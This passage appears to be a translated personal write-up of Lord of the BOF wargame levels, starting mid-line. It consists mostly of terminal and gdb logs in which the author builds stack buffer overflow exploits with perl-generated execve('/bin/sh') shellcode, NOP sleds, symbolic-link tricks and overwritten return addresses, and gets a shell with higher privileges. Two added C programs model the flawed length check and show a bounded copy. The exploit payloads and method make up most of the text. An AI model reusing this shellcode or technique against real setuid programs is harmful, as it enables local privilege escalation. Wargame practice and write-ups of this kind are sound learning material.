                memset(argv[i], 0, strlen(argv[i])); // overwrites each argv entry with zeros for its full length

}
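Added example (not the wargame's code): the length guard in skeleton.c rejects an argument only when strlen(argv[1]) > 48, yet the destination is buffer[40], and the argv[1][47] check runs before the length check. The C program below models that guard with constructed probe inputs, counts the argument lengths it accepts that strcpy would still overflow, and beside it shows a guard whose bound is derived from the destination, measured with a bounded length, and checked before any indexed access. All names, macros and probe strings here are mine.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the guard in skeleton.c. The level copies argv[1]
   into char buffer[40] with strcpy but only rejects arguments longer than
   48 bytes, so the bound is tied to the stack layout the level wants to
   show rather than to the buffer. */
#define BUFFER_SIZE 40 /* sizeof(buffer) in the level */
#define LEVEL_LIMIT 48 /* the "argument is too long!" threshold in the level */

/* strlen with an upper bound; written out so the block needs only ISO C */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* 1 if the level's guard (strlen(argv[1]) > 48 -> reject) lets arg through */
int level_guard_accepts(const char *arg)
{
    return strlen(arg) > LEVEL_LIMIT ? 0 : 1;
}

/* 1 if arg plus its NUL terminator actually fits in buffer[BUFFER_SIZE] */
int fits_buffer(const char *arg)
{
    return bounded_len(arg, BUFFER_SIZE) < BUFFER_SIZE;
}

/* How many argument lengths the level's guard accepts that strcpy would
   still overflow: every length from BUFFER_SIZE to LEVEL_LIMIT inclusive. */
int accepted_but_overflowing_lengths(void)
{
    char probe[LEVEL_LIMIT + 2]; /* constructed probe argument */
    int count = 0;
    for (size_t len = 0; len <= LEVEL_LIMIT; len++) {
        memset(probe, 'A', len);
        probe[len] = '\0';
        if (level_guard_accepts(probe) && !fits_buffer(probe))
            count++;
    }
    return count;
}

/* Hardened guard: the limit is derived from the destination, the length is
   measured with a bound (an unterminated argument cannot run strlen off),
   and the check happens before any indexed access such as arg[47].
   Returns 0 after copying, -1 when the argument is rejected. */
int guarded_copy(char *dst, size_t dstsz, const char *arg)
{
    size_t len = bounded_len(arg, dstsz);
    if (len >= dstsz)
        return -1; /* no room for the terminator: reject, do not truncate */
    memcpy(dst, arg, len + 1);
    return 0;
}

/* Result of guarded_copy into a buffer of the level's size */
int guarded_copy_into_level_buffer(const char *arg)
{
    char buffer[BUFFER_SIZE];
    return guarded_copy(buffer, sizeof buffer, arg);
}

int main(void)
{
    /* constructed 48-byte argument: accepted by the level, too big for buffer */
    const char *arg48 = "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAA";

    printf("level guard accepts 48 bytes: %d, fits buffer[40]: %d\n",
           level_guard_accepts(arg48), fits_buffer(arg48));
    printf("lengths accepted by the level's guard that overflow buffer[40]: %d\n",
           accepted_but_overflowing_lengths());
    printf("guarded_copy of the same 48 bytes: %d\n",
           guarded_copy_into_level_buffer(arg48));
    return 0;
}
```

The count of nine comes out of the gap between the two numbers: lengths 40 through 48 pass the level's check and none of them fits a 40-byte buffer with its terminator. Deriving the bound from sizeof(buffer), as guarded_copy does, closes that gap regardless of what the rest of the stack looks like.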

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core


warning: core file may not match specified executable file.

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

                                        켚Thjo??i0chi0tijY


                                                             ?y?投T?


Breakpoint 1, 0x8048506 in main ()

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

(snip)

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb) 

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb) 

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q  // here I realised I hadn't put nops in front. It was hard to read and find, so I filled it with nops.

The program is running.  Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

     X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh  skeleton.c

[vampire@localhost vampire]$ oh shit  // deleted the original program hehehe, the privileges are gone!

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

bash2: ./????????????????????????????????????????h?須?h

                                                       SThjo??i0chi0tijY


                                                                           Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core


warning: core file may not match specified executable file.

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

                                                                              켚Thjo??i0chi0tijY


                                                                                                   ?y?投T?


Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running.  Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

[vampire@localhost vampire]$ rm ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ln -s ./skeleton  `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass


...

Since I deleted the program partway through,

I'll look up the key and move on... lol

Ah, I've been having a really hard time mentally lately anyway, so this is at least some healing. Healing ♥︎


Whoaaaa!

This is wild!!

[troll@localhost troll]$ cat vampire.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - vampire

        - check 0xbfff

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

char buffer[40];


if(argc < 2){

printf("argv error\n");

exit(0);

}


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


        // here is changed!

        if(argv[1][46] == '\xff')            // the 47th byte of the payload, i.e. the return address, must not be of the form \xbfff...

        {

                printf("but it's not forever\n");

                exit(0);

        }


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

}

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44, "\xff\xff\xfe\xbf", "\x90"x70000, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜???????????????????????????????????????????????????????????????????????????????????????????????????????????

(...생략)

????????????????????????????????j

                                     X?Rh//shh/bin??S?訴€

bash$ my-pass

euid = 509


When I first saw it I was like "what the hell does this mean",

but the stack grows from high addresses to low addresses!! So you stretch it!! Way out!!!!

At first I was going to place the NOPs relative to 0xbfffffff, or look at esp in the core and measure the distance from there to 0xbffeffff, but I just roughly computed the distance from 0xbfffffff to 0xbffeffff and stuffed in NOPs like crazy! (70,000 of them, hahaha)

So you inflate the stack insanely!! Until the address becomes \xbffe...!! And then ride the NOP sled, zoom!!!!

It actually works lol

Hahahahaha, I think I'm going crazy.

I've been banging my head against this for almost a month now, lol

...and then solved it in a single day...

As always, when you're stuck, go back to the beginning, throw everything away and start over.

That's the truth.


The "more" section below is a copy-paste of my flailing (mental breakdown) log from start to finish.

Not recommended for your mental health. I'll write up a cleaned-up version below anyway.

There are also places where I lost it and mashed Enter...

But I feel like I'm still way behind.... I need to study harder, ugh

I was about to look up a writeup, but thought "ah, let me try just one more time!" and it worked.

And the stack is hard. I can picture it in my head, but as soon as more information comes in it all gets jumbled..

So I'm reading "Hacking: The Art of Exploitation"! I think it helped this time, lol



login: orge

Password: 

Last login: Fri Dec 13 09:58:07 from 192.168.0.1

[orge@localhost orge]$ ls

core

trall

trall.c

troll

troll.c

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x3\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` //create the symbolic link.

[orge@localhost orge]$ cat trall.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - troll

        - check argc + argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


// here is changed

if(argc != 2){

printf("argc must be two!\n");

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);


// one more!

memset(argv[1], 0, strlen(argv[1])); // argv[1] is zeroed out, so the shellcode has to go in argv[0]


}

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭 //하도 안되서 gdb로 코어를 뜯어보기로 했습니다.

Segmentation fault (core dumped)

[orge@localhost orge]$ gdb -q trall core


warning: core file may not match specified executable file.

Core was generated by `./?^12€l€?u楕凹2핽i00tii0cjo??T??

                                                                   귁?                            '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...Xshelldone.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffac9 in ?? ()

(gdb) x/50wx $esp

0xbffffa80: 0x00000000 0xbffffac4    0xbffffad0    0x40013868

0xbffffa90: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffaa0: 0x08048500 0x00000002 0xbffffac4    0x08048390

0xbffffab0: 0x080486ac 0x4000ae60 0xbffffabc    0x40013e90

0xbffffac0: 0x00000002 0xbffffbb8    0xbffffbeb     0x00000000

0xbffffad0: 0xbffffc1c    0xbffffc2b    0xbffffc42    0xbffffc61

0xbffffae0: 0xbffffc83    0xbffffc8d    0xbffffe50    0xbffffe6f

0xbffffaf0: 0xbffffe89    0xbffffe9e    0xbffffeba     0xbffffec5

0xbffffb00: 0xbffffedd    0xbffffeea    0xbffffef2     0xbffffefc

0xbffffb10: 0xbfffff0c     0xbfffff1a     0xbfffff28     0xbfffff39

0xbffffb20: 0xbfffff44     0xbfffff54     0xbfffff94     0x00000000

0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb40: 0x00000005 0x00000006

(gdb) 

0xbffffb48: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffb58: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffb68: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb78: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb88: 0x00000010 0x0febfbff     0x0000000f 0xbffffbb3

0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffba8: 0x00000000 0x00000000 0x69000000 0x00363836

0xbffffbb8: 0x11eb2f2e 0xb1c9315e 0x0e6c8032 0xe98001ff

0xbffffbc8: 0xebf67501 0xffeae805 0xc132ffff 0x30306951

0xbffffbd8: 0x30696974 0x8a6f6a63 0x8a5451e4 0x0cb19ae2

0xbffffbe8: 0x000081ce 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000

(gdb) quit

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`


????????????????????????????????????????????뫈

bash$ quit

sh: quit: command not found

bash$ exit

exit

[orge@localhost orge]$ ././`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'` //this is the one that failed because of the length. Sob..

????????????????????????????????????????????뫈

Segmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

bash$ my-pass

euid = 508


But even though I was thinking "does the address of argv[0] change??? nah, no way", I wasn't sure, so I kept adding code to check the address of argv[0]; I still don't know why the result from that code differs from where argv[0] actually was. Anyone care to explain...

My computer is lagging so I can't write any more. When I type fast the letters come out with gaps;; T_T


NOTES (rage warning)

argc = number of words in the arguments passed

But memset is applied to argv[1], and I can't put it in argv[3] either, what do I do

- use a symbolic link

- they say it's a file that points to a file; is it like a pointer?? or like an environment variable

When I use the symbolic link it prints "stack is still your friend!" argh, so annoying

They say it's because of \x2f


Hmm, then the payload

Put the shellcode in argv[0] (symbolic link), get the address of argv[0], then satisfy the \xbf check with argv[1]. Then slide down the NOP sled in argv! But there isn't one! No choice but to find the address of argv[0] and jump straight there!

Fill 44 bytes of argv[1] with garbage and then put the return address after it.. would that work?



[darkelf@localhost darkelf]$ cat orge.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orge

        - check argv[0]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// here is changed!

if(strlen(argv[0]) != 77){ // if argv[0], i.e. the (program name) input, is shorter than 77 it errors out.

                printf("argv[0] error\n");

                exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}
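The same strcpy() into char buffer[40] appears in vampire.c, troll.c and orge.c above, and the latter two only reject arguments longer than 48 bytes. As an added example (not the post's or the wargame's code; the buffer size and the 48-byte limit are taken from the listings above, everything else is assumed), here is a short C program that contrasts that check with a copy bounded by the destination size and reports which argument lengths the original check lets through:

```c
#include <stdio.h>
#include <string.h>

/* Added example, not part of the original post or the LOB sources.
 * troll.c and orge.c copy argv[1] into a 40-byte stack buffer with
 * strcpy() after checking only that strlen(argv[1]) <= 48.  Since
 * 48 > 40, the 8 bytes that follow the buffer are still reachable,
 * which is exactly the window the 44-byte filler + 4-byte address
 * payloads in the logs rely on.  The functions below contrast that
 * check with a bound derived from the destination size. */

#define BUF_SIZE 40          /* char buffer[40] in the challenge sources */
#define ORIGINAL_LIMIT 48    /* the "argument is too long!" threshold   */

/* Reproduces the original acceptance test: 1 if troll.c/orge.c would
 * go on to call strcpy(buffer, arg), 0 if they would print
 * "argument is too long!" and exit. */
int original_check_accepts(const char *arg)
{
    return strlen(arg) <= ORIGINAL_LIMIT;
}

/* Hardened copy: refuses anything that does not fit in dst together
 * with its terminator.  Returns 0 on success, -1 on rejection; dst is
 * left untouched on rejection and is always NUL-terminated on success. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t len = strlen(src);
    if (dstsize == 0 || len >= dstsize)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* 1 if the original check accepts arg even though arg does not fit in
 * a BUF_SIZE buffer, i.e. the gap the 48-byte length check leaves open. */
int original_check_is_bypassed(const char *arg)
{
    char buffer[BUF_SIZE];
    return original_check_accepts(arg) &&
           copy_bounded(buffer, sizeof buffer, arg) != 0;
}

/* Constructed input: an argument of n 'A' bytes (n < 256).  Returns
 * original_check_is_bypassed() for it, or -1 if n is out of range. */
int bypassed_for_length(size_t n)
{
    char arg[256];
    if (n >= sizeof arg)
        return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return original_check_is_bypassed(arg);
}

int main(void)
{
    /* Lengths around the two boundaries: buffer[40] and the 48 limit. */
    size_t lengths[] = { 39, 40, 44, 47, 48, 49 };
    char buffer[BUF_SIZE];
    size_t i;

    for (i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        char arg[256];
        memset(arg, 'A', lengths[i]);
        arg[lengths[i]] = '\0';
        printf("strlen(argv[1]) = %2lu: original check %s, copy_bounded %s\n",
               (unsigned long)lengths[i],
               original_check_accepts(arg) ? "accepts" : "rejects",
               copy_bounded(buffer, sizeof buffer, arg) == 0 ? "copies " : "rejects");
    }
    return 0;
}
```

Lengths 40 through 48 are accepted by the original check yet rejected by copy_bounded(); they are precisely the inputs that can overwrite what sits past the buffer, so the fix is to size the check from the destination (sizeof buffer), not from a constant chosen independently of it.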


[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xc0\xfb\xff\xbf"'` //first match the program name length to 77, then try the attack

j

 X?Rh//shh/bin??S?訴€?????????????????????적

Segmentation fault (core dumped)

[darkelf@localhost darkelf]$ gdb -q orgi core

Core was generated by `.////////////////////////////////////////////////////////////////////////orgi j'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffff7 in ?? ()

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54    0xbffffa60    0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54    0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c    0x40013e90

0xbffffa50: 0x00000002 0xbffffb52    0xbffffba0    0x00000000

0xbffffa60: 0xbffffbd1    0xbffffbe3    0xbffffbfa     0xbffffc19

0xbffffa70: 0xbffffc3b    0xbffffc48    0xbffffe0b    0xbffffe2a

0xbffffa80: 0xbffffe47    0xbffffe5c    0xbffffe7b    0xbffffe86

0xbffffa90: 0xbffffe9e    0xbffffeae    0xbffffeb6    0xbffffec0

0xbffffaa0: 0xbffffed0    0xbffffede    0xbffffeec    0xbffffefd

0xbffffab0: 0xbfffff08     0xbfffff1b     0xbfffff5e     0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)  

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fa 0x0000000c 0x000001fa

0xbffffb08: 0x0000000d 0x000001fa 0x0000000e 0x000001fa

0xbffffb18: 0x00000010 0x0febfbff    0x0000000f 0xbffffb4d

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x38366900 0x2f2e0036 0x2f2f2f2f

0xbffffb58: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb68: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb78: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb88: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

